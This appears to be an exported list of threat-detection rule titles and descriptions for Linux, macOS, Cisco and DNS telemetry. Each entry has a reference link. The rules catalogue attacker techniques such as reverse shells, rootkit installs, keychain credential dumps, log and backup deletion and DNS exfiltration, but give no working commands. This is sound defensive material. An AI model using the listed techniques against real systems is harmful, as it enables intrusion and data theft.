History File Deletion Detects events in which a history file gets deleted, e.g. ~/.bash_history, to remove traces of malicious activity https://github.com/sleventyeleven/linuxprivchecker/, https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1552.003/T1552.003.md
Print History File Contents Detects events in which someone prints the contents of history files to the commandline or redirects it to a file for reconnaissance https://github.com/sleventyeleven/linuxprivchecker/, https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1552.003/T1552.003.md
Linux HackTool Execution Detects known hacktool execution based on image name. https://github.com/Gui774ume/ebpfkit, https://github.com/pathtofile/bad-bpf, https://github.com/carlospolop/PEASS-ng, https://github.com/t3l3machus/hoaxshell, https://github.com/t3l3machus/Villain, https://github.com/HavocFramework/Havoc, https://github.com/1N3/Sn1per, https://github.com/Ne0nd0g/merlin, https://github.com/Pennyw0rth/NetExec/
Potential Container Discovery Via Inodes Listing Detects listing of the inodes of the "/" directory to determine whether the process is running inside a container. https://blog.skyplabs.net/posts/container-detection/, https://stackoverflow.com/questions/20010199/how-to-determine-if-a-process-runs-inside-lxc-docker
Interactive Bash Suspicious Children Detects suspicious interactive bash as a parent to rather uncommon child processes Internal Research
Suspicious Java Children Processes Detects java process spawning suspicious children https://www.tecmint.com/different-types-of-linux-shells/
Linux Network Service Scanning Tools Execution Detects execution of network scanning and reconnaissance tools. These tools can be used for the enumeration of local or remote network services, for example. https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1046/T1046.md, https://github.com/projectdiscovery/naabu, https://github.com/Tib3rius/AutoRecon
Linux Shell Pipe to Shell Detects suspicious process command line that starts with a shell that executes something and finally gets piped into another shell Internal Research
Linux Recon Indicators Detects events with patterns found in commands used for reconnaissance on Linux systems https://github.com/sleventyeleven/linuxprivchecker/blob/0d701080bbf92efd464e97d71a70f97c6f2cd658/linuxprivchecker.py
Potential Suspicious Change To Sensitive/Critical Files Detects changes of sensitive and critical files. Monitors files that you don't expect to change without planning on Linux systems. https://learn.microsoft.com/en-us/azure/defender-for-cloud/file-integrity-monitoring-overview#which-files-should-i-monitor
Execution Of Script Located In Potentially Suspicious Directory Detects executions of scripts located in potentially suspicious locations such as "/tmp" via a shell such as "bash", "sh", etc. https://blogs.jpcert.or.jp/en/2023/05/gobrat.html, https://jstnk9.github.io/jstnk9/research/GobRAT-Malware/, https://www.virustotal.com/gui/file/60bcd645450e4c846238cf0e7226dc40c84c96eba99f6b2cffcd0ab4a391c8b3/detection, https://www.virustotal.com/gui/file/3e44c807a25a56f4068b5b8186eee5002eed6f26d665a8b791c472ad154585d1/detection
Shell Execution Of Process Located In Tmp Directory Detects execution of shells from a parent process located in a temporary (/tmp) directory https://blogs.jpcert.or.jp/en/2023/05/gobrat.html, https://jstnk9.github.io/jstnk9/research/GobRAT-Malware/, https://www.virustotal.com/gui/file/60bcd645450e4c846238cf0e7226dc40c84c96eba99f6b2cffcd0ab4a391c8b3/detection, https://www.virustotal.com/gui/file/3e44c807a25a56f4068b5b8186eee5002eed6f26d665a8b791c472ad154585d1/detection
System Information Discovery Detects system information discovery commands https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1082/T1082.md
System Network Connections Discovery - Linux Detects usage of system utilities to discover system network connections https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1049/T1049.md
System Network Discovery - Linux Detects enumeration of local network configuration https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1016/T1016.md
Touch Suspicious Service File Detects usage of the "touch" process on a service file. https://blogs.blackberry.com/, https://twitter.com/Joseliyo_Jstnk/status/1620131033474822144
Triple Cross eBPF Rootkit Execve Hijack Detects execution of the file "execve_hijack" which is used by the Triple Cross rootkit as a way to elevate privileges https://github.com/h3xduck/TripleCross/blob/1f1c3e0958af8ad9f6ebe10ab442e75de33e91de/src/helpers/execve_hijack.c#L275
Triple Cross eBPF Rootkit Install Commands Detects default install commands of the Triple Cross eBPF rootkit based on the "deployer.sh" script https://github.com/h3xduck/TripleCross/blob/1f1c3e0958af8ad9f6ebe10ab442e75de33e91de/apps/deployer.sh
User Has Been Deleted Via Userdel Detects execution of the "userdel" binary, which is used to delete a user account and related files. This is sometimes abused by threat actors in order to cover their tracks https://linuxize.com/post/how-to-delete-group-in-linux/, https://www.cyberciti.biz/faq/linux-remove-user-command/, https://www.cybrary.it/blog/0p3n/linux-commands-used-attackers/, https://linux.die.net/man/8/userdel
User Added To Root/Sudoers Group Using Usermod Detects usage of the "usermod" binary to add users to the root or sudoers groups https://pberba.github.io/security/2021/11/23/linux-threat-hunting-for-persistence-account-creation-manipulation/, https://www.configserverfirewall.com/ubuntu-linux/ubuntu-add-user-to-root-group/
Vim GTFOBin Abuse - Linux Detects the use of "vim" and its sibling commands to execute a shell or proxy commands. Such behavior may be associated with privilege escalation, unauthorized command execution, or to break out from restricted environments. https://gtfobins.github.io/gtfobins/vim/, https://gtfobins.github.io/gtfobins/rvim/, https://gtfobins.github.io/gtfobins/vimdiff/
Linux Webshell Indicators Detects suspicious sub processes of web server processes https://www.acunetix.com/blog/articles/web-shells-101-using-php-introduction-web-shells-part-2/, https://media.defense.gov/2020/Jun/09/2002313081/-1/-1/0/CSI-DETECT-AND-PREVENT-WEB-SHELL-MALWARE-20200422.PDF
Download File To Potentially Suspicious Directory Via Wget Detects the use of wget to download content to a suspicious directory https://blogs.jpcert.or.jp/en/2023/05/gobrat.html, https://jstnk9.github.io/jstnk9/research/GobRAT-Malware/, https://www.virustotal.com/gui/file/60bcd645450e4c846238cf0e7226dc40c84c96eba99f6b2cffcd0ab4a391c8b3/detection, https://www.virustotal.com/gui/file/3e44c807a25a56f4068b5b8186eee5002eed6f26d665a8b791c472ad154585d1/detection
Potential Xterm Reverse Shell Detects usage of "xterm" as a potential reverse shell tunnel https://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet, https://www.revshells.com/
MacOS Emond Launch Daemon Detects additions to the Emond Launch Daemon that adversaries may use to gain persistence and elevate privileges. https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1546.014/T1546.014.md, https://posts.specterops.io/leveraging-emond-on-macos-for-persistence-a040a2785124
Startup Item File Created - MacOS Detects the creation of a startup item plist file that is automatically executed at boot initialization. Adversaries may use startup items automatically executed at boot initialization to establish persistence. Startup items execute during the final phase of the boot process and contain shell scripts or other executable files along with configuration information used by the system to determine the execution order for all startup items. https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1037.005/T1037.005.md, https://developer.apple.com/library/archive/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/StartupItems.html
MacOS Scripting Interpreter AppleScript Detects execution of the macOS scripting language AppleScript. https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1059.002/T1059.002.md, https://redcanary.com/blog/applescript/
Decode Base64 Encoded Text -MacOs Detects usage of base64 utility to decode arbitrary base64-encoded text https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1027/T1027.md
Binary Padding - MacOS Adversaries may use binary padding to add junk data and change the on-disk representation of malware. This rule detects the use of dd and truncate to add junk data to a file. https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1027.001/T1027.001.md, https://linux.die.net/man/1/truncate, https://linux.die.net/man/1/dd
File Time Attribute Change Detects file time attribute changes made to hide new files or changes to existing files https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.006/T1070.006.md
Hidden Flag Set On File/Directory Via Chflags - MacOS Detects the execution of the "chflags" utility with the "hidden" flag, in order to hide files on MacOS. When a file or directory has this hidden flag set, it becomes invisible to the default file listing commands and in graphical file browsers. https://www.sentinelone.com/labs/apt32-multi-stage-macos-trojan-innovates-on-crimeware-scripting-technique/, https://www.welivesecurity.com/2019/04/09/oceanlotus-macos-malware-update/, https://www.paloaltonetworks.com/content/dam/pan/en_US/assets/pdf/reports/Unit_42/unit42-wirelurker.pdf, https://ss64.com/mac/chflags.html
Indicator Removal on Host - Clear Mac System Logs Detects deletion of local audit logs https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.002/T1070.002.md
Clipboard Data Collection Via OSAScript Detects possible collection of data from the clipboard via execution of the osascript binary https://www.sentinelone.com/blog/how-offensive-actors-use-applescript-for-attacking-macos/
Creation Of A Local User Account Detects the creation of a new user account. Such accounts may be used for persistence without requiring persistent remote access tools to be deployed on the system. https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1136.001/T1136.001.md, https://ss64.com/osx/sysadminctl.html
Hidden User Creation Detects creation of a hidden user account on macOS (UserID < 500) or with IsHidden option https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1564.002/T1564.002.md
Credentials from Password Stores - Keychain Detects password dumps from Keychain https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1555.001/T1555.001.md, https://gist.github.com/Capybara/6228955
System Integrity Protection (SIP) Disabled Detects the use of csrutil to disable System Integrity Protection (SIP). This technique is used in post-exploit scenarios. https://ss64.com/osx/csrutil.html, https://objective-see.org/blog/blog_0x6D.html, https://www.welivesecurity.com/2017/10/20/osx-proton-supply-chain-attack-elmedia/, https://www.virustotal.com/gui/file/05a2adb266ec6c0ba9ed176d87d8530e71e845348c13caf9f60049760c312cd3/behavior
System Integrity Protection (SIP) Enumeration Detects the use of csrutil to view the System Integrity Protection (SIP) status. This technique is used in post-exploit scenarios. https://ss64.com/osx/csrutil.html, https://objective-see.org/blog/blog_0x6D.html, https://www.welivesecurity.com/2017/10/20/osx-proton-supply-chain-attack-elmedia/, https://www.virustotal.com/gui/file/05a2adb266ec6c0ba9ed176d87d8530e71e845348c13caf9f60049760c312cd3/behavior
Disable Security Tools Detects disabling security tools https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md
User Added To Admin Group Via Dscl Detects attempts to create and add an account to the admin group via "dscl" https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.003/T1078.003.md#atomic-test-2---create-local-account-with-admin-privileges---macos, https://ss64.com/osx/dscl.html
User Added To Admin Group Via DseditGroup Detects attempts to create and/or add an account to the admin group, thus granting admin privileges. https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.003/T1078.003.md#atomic-test-5---add-a-newexisting-user-to-the-admin-group-using-dseditgroup-utility---macos, https://ss64.com/osx/dseditgroup.html
Root Account Enable Via Dsenableroot Detects attempts to enable the root account via "dsenableroot" https://github.com/redcanaryco/atomic-red-team/blob/b27a3cb25025161d49ac861cb216db68c46a3537/atomics/T1078.003/T1078.003.md, https://github.com/elastic/detection-rules/blob/4312d8c9583be524578a14fe6295c3370b9a9307/rules/macos/persistence_enable_root_account.toml, https://ss64.com/osx/dsenableroot.html
File and Directory Discovery - MacOS Detects usage of system utilities to discover files and directories https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1083/T1083.md
Credentials In Files Detects attempts to extract passwords with grep and LaZagne https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1552.001/T1552.001.md
GUI Input Capture - macOS Detects attempts to use system dialog prompts to capture user credentials https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1056.002/T1056.002.md, https://scriptingosx.com/2018/08/user-interaction-from-bash-scripts/
Disk Image Creation Via Hdiutil - MacOS Detects the execution of the hdiutil utility in order to create a disk image. https://www.loobins.io/binaries/hdiutil/, https://www.sentinelone.com/blog/from-the-front-linesunsigned-macos-orat-malware-gambles-for-the-win/, https://ss64.com/mac/hdiutil.html
Disk Image Mounting Via Hdiutil - MacOS Detects the execution of the hdiutil utility in order to mount disk images. https://www.loobins.io/binaries/hdiutil/, https://www.sentinelone.com/blog/from-the-front-linesunsigned-macos-orat-malware-gambles-for-the-win/, https://ss64.com/mac/hdiutil.html
Suspicious Installer Package Child Process Detects the execution of suspicious child processes from macOS installer package parent process. This includes osascript, JXA, curl and wget amongst other interpreters https://redcanary.com/blog/clipping-silver-sparrows-wings/, https://github.com/elastic/detection-rules/blob/4312d8c9583be524578a14fe6295c3370b9a9307/rules/macos/execution_installer_package_spawned_network_event.toml
System Information Discovery Using Ioreg Detects the use of "ioreg" which will show I/O Kit registry information. This process is used for system information discovery. It has been observed in-the-wild by calling this process directly or using bash and grep to look for specific strings. https://www.virustotal.com/gui/file/0373d78db6c3c0f6f6dcc409821bf89e1ad8c165d6f95c5c80ecdce2219627d7/behavior, https://www.virustotal.com/gui/file/4ffdc72d1ff1ee8228e31691020fc275afd1baee5a985403a71ca8c7bd36e2e4/behavior, https://www.virustotal.com/gui/file/5907d59ec1303cfb5c0a0f4aaca3efc0830707d86c732ba6b9e842b5730b95dc/behavior, https://www.trendmicro.com/en_ph/research/20/k/new-macos-backdoor-connected-to-oceanlotus-surfaces.html
JAMF MDM Potential Suspicious Child Process Detects potential suspicious child processes of "jamf". Could be a sign of potential abuse of Jamf as a C2 server as seen by Typhon MythicAgent. https://github.com/MythicAgents/typhon/, https://www.zoocoup.org/casper/jamf_cheatsheet.pdf, https://docs.jamf.com/10.30.0/jamf-pro/administrator-guide/Components_Installed_on_Managed_Computers.html
JAMF MDM Execution Detects execution of the "jamf" binary to create user accounts and run commands. For example, the binary can be abused by attackers on the system in order to bypass security controls or remove application control policies. https://github.com/MythicAgents/typhon/, https://www.zoocoup.org/casper/jamf_cheatsheet.pdf, https://docs.jamf.com/10.30.0/jamf-pro/administrator-guide/Components_Installed_on_Managed_Computers.html
JXA In-memory Execution Via OSAScript Detects possible malicious execution of JXA in-memory via OSAScript https://redcanary.com/blog/applescript/
Launch Agent/Daemon Execution Via Launchctl Detects the execution of programs as Launch Agents or Launch Daemons using launchctl on macOS. https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1569.001/T1569.001.md, https://www.sentinelone.com/labs/20-common-tools-techniques-used-by-macos-threat-actors-malware/, https://www.welivesecurity.com/2020/07/16/mac-cryptocurrency-trading-application-rebranded-bundled-malware/, https://www.trendmicro.com/en_us/research/18/d/new-macos-backdoor-linked-to-oceanlotus-found.html, https://www.loobins.io/binaries/launchctl/
Local System Accounts Discovery - MacOs Detects enumeration of local system accounts on MacOS https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1087.001/T1087.001.md
Local Groups Discovery - MacOs Detects enumeration of local system groups https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1069.001/T1069.001.md
MacOS Network Service Scanning Detects enumeration of local or remote network services. https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1046/T1046.md
Network Sniffing - MacOs Detects the usage of tooling to sniff network traffic. An adversary may place a network interface into promiscuous mode to passively access data in transit over the network, or use span ports to capture a larger amount of data. https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1040/T1040.md
File Download Via Nscurl - MacOS Detects the execution of the nscurl utility in order to download files. https://www.loobins.io/binaries/nscurl/, https://www.agnosticdev.com/content/how-diagnose-app-transport-security-issues-using-nscurl-and-openssl, https://gist.github.com/nasbench/ca6ef95db04ae04ffd1e0b1ce709cadd
Suspicious Microsoft Office Child Process - MacOS Detects suspicious child processes spawning from Microsoft Office suite applications such as Word or Excel. This could indicate malicious macro execution https://redcanary.com/blog/applescript/, https://objective-see.org/blog/blog_0x4B.html
OSACompile Run-Only Execution Detects potential suspicious run-only executions compiled using OSACompile https://redcanary.com/blog/applescript/, https://ss64.com/osx/osacompile.html
Payload Decoded and Decrypted via Built-in Utilities Detects when a built-in utility is used to decode and decrypt a payload after a macOS disk image (DMG) is executed. Malware authors may attempt to evade detection and trick users into executing malicious code by encoding and encrypting their payload and placing it in a disk image file. This behavior is consistent with adware or malware families such as Bundlore and Shlayer. https://github.com/elastic/protections-artifacts/commit/746086721fd385d9f5c6647cada1788db4aea95f#diff-5d42c3d772e04f1e8d0eb60f5233bc79def1ea73105a2d8822f44164f77ef823
Potential Persistence Via PlistBuddy Detects potential persistence activity using LaunchAgents or LaunchDaemons via the PlistBuddy utility https://redcanary.com/blog/clipping-silver-sparrows-wings/, https://www.manpagez.com/man/8/PlistBuddy/
Remote Access Tool - Team Viewer Session Started On MacOS Host Detects the command line executed when TeamViewer starts a session initiated by a remote host. Once a connection has been started, an investigator can verify the connection details by viewing the "incoming_connections.txt" log file in the TeamViewer folder. Internal Research
Macos Remote System Discovery Detects the enumeration of other remote systems. https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1018/T1018.md
Scheduled Cron Task/Job - MacOs Detects abuse of the cron utility to perform task scheduling for initial or recurring execution of malicious code. Detection will focus on crontab jobs uploaded from the tmp folder. https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1053.003/T1053.003.md
Screen Capture - macOS Detects attempts to use screencapture to collect macOS screenshots https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1113/T1113.md, https://github.com/EmpireProject/Empire/blob/08cbd274bef78243d7a8ed6443b8364acd1fc48b/lib/modules/python/collection/osx/screenshot.py
Security Software Discovery - MacOs Detects usage of system utilities (only grep for now) to discover security software https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1518.001/T1518.001.md
Space After Filename - macOS Detects attempts to masquerade as legitimate files by adding a space to the end of the filename. https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1036.006/T1036.006.md
Split A File Into Pieces Detects use of the command "split" to split files into parts for possible transfer. https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1030/T1030.md
Osacompile Execution By Potentially Suspicious Applet/Osascript Detects a potentially suspicious applet or osascript executing "osacompile". https://redcanary.com/blog/mac-application-bundles/
Suspicious Browser Child Process - MacOS Detects suspicious child processes spawned from browsers. This could be a result of a potential web browser exploitation. https://fr.slideshare.net/codeblue_jp/cb19-recent-apt-attack-on-crypto-exchange-employees-by-heungsoo-kang, https://github.com/elastic/detection-rules/blob/4312d8c9583be524578a14fe6295c3370b9a9307/rules/macos/execution_initial_access_suspicious_browser_childproc.toml
Suspicious Execution via macOS Script Editor Detects when the macOS Script Editor utility spawns an unusual child process. https://github.com/elastic/protections-artifacts/commit/746086721fd385d9f5c6647cada1788db4aea95f#diff-7f541fbc4a4a28a92970e8bf53effea5bd934604429112c920affb457f5b2685, https://wojciechregula.blog/post/macos-red-teaming-initial-access-via-applescript-url/
Potential Discovery Activity Using Find - MacOS Detects usage of "find" binary in a suspicious manner to perform discovery https://github.com/SaiSathvik1/Linux-Privilege-Escalation-Notes
Suspicious History File Operations Detects commandline operations on shell history files https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1552.003/T1552.003.md
Potential In-Memory Download And Compile Of Payloads Detects potential in-memory downloading and compiling of applets using curl and osacompile as seen used by XCSSET malware https://redcanary.com/blog/mac-application-bundles/
Suspicious MacOS Firmware Activity Detects when a user manipulates the Firmware Password on macOS. NOTE - this command has been disabled on Apple silicon-based computers. https://github.com/usnistgov/macos_security/blob/932a51f3e819dd3e02ebfcf3ef433cfffafbe28b/rules/os/os_firmware_password_require.yaml, https://www.manpagez.com/man/8/firmwarepasswd/, https://support.apple.com/guide/security/firmware-password-protection-sec28382c9ca/web
System Network Discovery - macOS Detects enumeration of local network configuration https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1016/T1016.md
System Information Discovery Using sw_vers Detects the use of "sw_vers" for system information discovery https://www.virustotal.com/gui/file/d3fa64f63563fe958b75238742d1e473800cb5f49f5cb79d38d4aa3c93709026/behavior, https://www.virustotal.com/gui/file/03b71eaceadea05bc0eea5cddecaa05f245126d6b16cfcd0f3ba0442ac58dab3/behavior, https://ss64.com/osx/sw_vers.html
User Added To Admin Group Via Sysadminctl Detects attempts to create and add an account to the admin group via "sysadminctl" https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.003/T1078.003.md#atomic-test-3---create-local-account-with-admin-privileges-using-sysadminctl-utility---macos, https://ss64.com/osx/sysadminctl.html
Guest Account Enabled Via Sysadminctl Detects attempts to enable the guest account using the sysadminctl utility https://ss64.com/osx/sysadminctl.html
System Information Discovery Via Sysctl - MacOS Detects the execution of "sysctl" with specific arguments that have been used by threat actors and malware. It provides system hardware information. This process is primarily used to detect and avoid virtualization and analysis environments. https://www.loobins.io/binaries/sysctl/#, https://evasions.checkpoint.com/techniques/macos.html, https://www.welivesecurity.com/2019/04/09/oceanlotus-macos-malware-update/, https://www.sentinelone.com/labs/20-common-tools-techniques-used-by-macos-threat-actors-malware/, https://objective-see.org/blog/blog_0x1E.html, https://www.virustotal.com/gui/file/1c547a064494a35d6b5e6b459de183ab2720a22725e082bed6f6629211f7abc1/behavior, https://www.virustotal.com/gui/file/b4b1fc65f87b3dcfa35e2dbe8e0a34ad9d8a400bec332025c0a2e200671038aa/behavior
System Information Discovery Using System_Profiler Detects the execution of "system_profiler" with specific "Data Types" that have been seen being used by threat actors and malware. It provides system hardware and software configuration information. This process is primarily used for system information discovery. However, "system_profiler" can also be used to determine if virtualization software is being run for defense evasion purposes. https://www.trendmicro.com/en_za/research/20/k/new-macos-backdoor-connected-to-oceanlotus-surfaces.html, https://www.sentinelone.com/wp-content/uploads/pdf-gen/1630910064/20-common-tools-techniques-used-by-macos-threat-actors-malware.pdf, https://ss64.com/mac/system_profiler.html, https://objective-see.org/blog/blog_0x62.html, https://www.welivesecurity.com/2019/04/09/oceanlotus-macos-malware-update/, https://gist.github.com/nasbench/9a1ba4bc7094ea1b47bc42bf172961af
System Network Connections Discovery - MacOs Detects usage of system utilities to discover system network connections https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1049/T1049.md
System Shutdown/Reboot - MacOs Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems. https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1529/T1529.md
Potential Base64 Decoded From Images Detects the use of tail to extract bytes at an offset from an image and then decode the base64 value to create a new file with the decoded content. The detected execution is a bash one-liner. https://www.virustotal.com/gui/file/16bafdf741e7a13137c489f3c8db1334f171c7cb13b62617d691b0a64783cc48/behavior, https://www.virustotal.com/gui/file/483fafc64a2b84197e1ef6a3f51e443f84dc5742602e08b9e8ec6ad690b34ed0/behavior
Time Machine Backup Deletion Attempt Via Tmutil - MacOS Detects deletion attempts of MacOS Time Machine backups via the native backup utility "tmutil". An adversary may perform this action before launching a ransomware attack to prevent the victim from restoring their files. https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1490/T1490.md#atomic-test-12---disable-time-machine, https://www.loobins.io/binaries/tmutil/
Time Machine Backup Disabled Via Tmutil - MacOS Detects disabling of Time Machine (Apple's automated backup utility software) via the native macOS backup utility "tmutil". An attacker can use this to prevent backups from occurring. https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1490/T1490.md#atomic-test-12---disable-time-machine, https://www.loobins.io/binaries/tmutil/
New File Exclusion Added To Time Machine Via Tmutil - MacOS Detects the addition of a new file or path exclusion to MacOS Time Machine via the "tmutil" utility. An adversary could exclude a path from Time Machine backups to prevent certain files from being backed up. https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1490/T1490.md#atomic-test-12---disable-time-machine, https://www.loobins.io/binaries/tmutil/
Potential WizardUpdate Malware Infection Detects the execution traces of the WizardUpdate malware. WizardUpdate is a macOS trojan that attempts to infiltrate macOS machines to steal data and it is associated with other types of malicious payloads, increasing the chances of multiple infections on a device. https://github.com/elastic/protections-artifacts/commit/746086721fd385d9f5c6647cada1788db4aea95f#diff-c68a1fcbf7a3f80c87225d7fdc031f691e9f3b6a14a36754be00762bfe6eae97, https://malpedia.caad.fkie.fraunhofer.de/details/osx.xcsset, https://www.microsoft.com/security/blog/2022/02/02/the-evolution-of-a-mac-trojan-updateagents-progression/
Gatekeeper Bypass via Xattr Detects macOS Gatekeeper bypass via xattr utility https://github.com/redcanaryco/atomic-red-team/blob/1fed40dc7e48f16ed44dcdd9c73b9222a70cca85/atomics/T1553.001/T1553.001.md, https://www.loobins.io/binaries/xattr/
Potential XCSSET Malware Infection Identifies the execution traces of the XCSSET malware. XCSSET is a macOS trojan that primarily spreads via Xcode projects and maliciously modifies applications. Infected users are also vulnerable to having their credentials, accounts, and other vital data stolen. https://github.com/elastic/protections-artifacts/commit/746086721fd385d9f5c6647cada1788db4aea95f#diff-f5deb07688e1a8dec9530bc3071967b2da5c16b482e671812b864c37beb28f08, https://malpedia.caad.fkie.fraunhofer.de/details/osx.xcsset
Cisco Clear Logs Clear command history in network OS which is used for defense evasion https://www.cisco.com/c/en/us/td/docs/switches/datacenter/nexus5000/sw/command/reference/sysmgmt/n5k-sysmgmt-cr/n5k-sm_cmds_c.html, https://www.cisco.com/c/en/us/td/docs/ios/12_2sr/12_2sra/feature/guide/srmgtint.html#wp1127609
Cisco Collect Data Collect pertinent data from the configuration files https://blog.router-switch.com/2013/11/show-running-config/, https://www.cisco.com/E-Learning/bulk/public/tac/cim/cib/using_cisco_ios_software/cmdrefs/show_startup-config.htm, https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/config-mgmt/configuration/15-sy/config-mgmt-15-sy-book/cm-config-diff.html
Cisco Crypto Commands Show when private keys are being exported from the device, or when new certificates are installed https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/security/a1/sec-a1-cr-book/sec-a1-cr-book_chapter_0111.html
Cisco Disabling Logging Turn off logging locally or remote https://www.cisco.com/en/US/docs/ios/security/command/reference/sec_a2.pdf
Cisco Discovery Find information about network devices that is not stored in config files https://www.cisco.com/c/en/us/td/docs/server_nw_virtual/2-5_release/command_reference/show.html
Cisco Denial of Service Detect a system being shutdown or put into different boot mode None
Cisco File Deletion See what files are being deleted from flash file systems None
Cisco Show Commands Input See what commands are being input into the device by other people, full credentials can be in the history None
Cisco Local Accounts Find local accounts being created or modified as well as remote authentication configurations None
Cisco Modify Configuration Modifications to a config that will serve an adversary's impacts or persistence None
Cisco Stage Data Various protocols may be used to put data on the device for exfil or infil None
Cisco Sniffing Show when a monitor or a span/rspan is setup or modified None
Cisco BGP Authentication Failures Detects BGP failures which may be indicative of brute force attacks to manipulate routing https://www.blackhat.com/presentations/bh-usa-03/bh-us-03-convery-franz-v3.pdf
Cisco LDP Authentication Failures Detects LDP failures which may be indicative of brute force attacks to manipulate MPLS labels https://www.blackhat.com/presentations/bh-usa-03/bh-us-03-convery-franz-v3.pdf
DNS Query to External Service Interaction Domains Detects suspicious DNS queries to external service interaction domains often used for out-of-band interactions after successful RCE https://twitter.com/breakersall/status/1533493587828260866
Cobalt Strike DNS Beaconing Detects suspicious DNS queries known from Cobalt Strike beacons https://www.icebrg.io/blog/footprints-of-fin7-tracking-actor-patterns, https://www.sekoia.io/en/hunting-and-detecting-cobalt-strike/
Monero Crypto Coin Mining Pool Lookup Detects suspicious DNS queries to Monero mining pools https://www.nextron-systems.com/2021/10/24/monero-mining-pool-fqdns/
Suspicious DNS Query with B64 Encoded String Detects suspicious DNS queries using base64 encoding https://github.com/krmaxwell/dns-exfiltration
Telegram Bot API Request Detects suspicious DNS queries to api.telegram.org used by Telegram Bots of any kind https://core.telegram.org/bots/faq, https://researchcenter.paloaltonetworks.com/2018/03/unit42-telerat-another-android-trojan-leveraging-telegrams-bot-api-to-target-iranian-users/, https://blog.malwarebytes.com/threat-analysis/2016/11/telecrypt-the-ransomware-abusing-telegram-api-defeated/, https://www.welivesecurity.com/2016/12/13/rise-telebots-analyzing-disruptive-killdisk-attacks/
DNS TXT Answer with Possible Execution Strings Detects strings used in command execution in DNS TXT Answer https://twitter.com/stvemillertime/status/1024707932447854592, https://github.com/samratashok/nishang/blob/414ee1104526d7057f9adaeee196d91ae447283e/Backdoors/DNS_TXT_Pwnage.ps1
Wannacry Killswitch Domain Detects WannaCry killswitch domain DNS queries https://www.mandiant.com/resources/blog/wannacry-ransomware-campaign
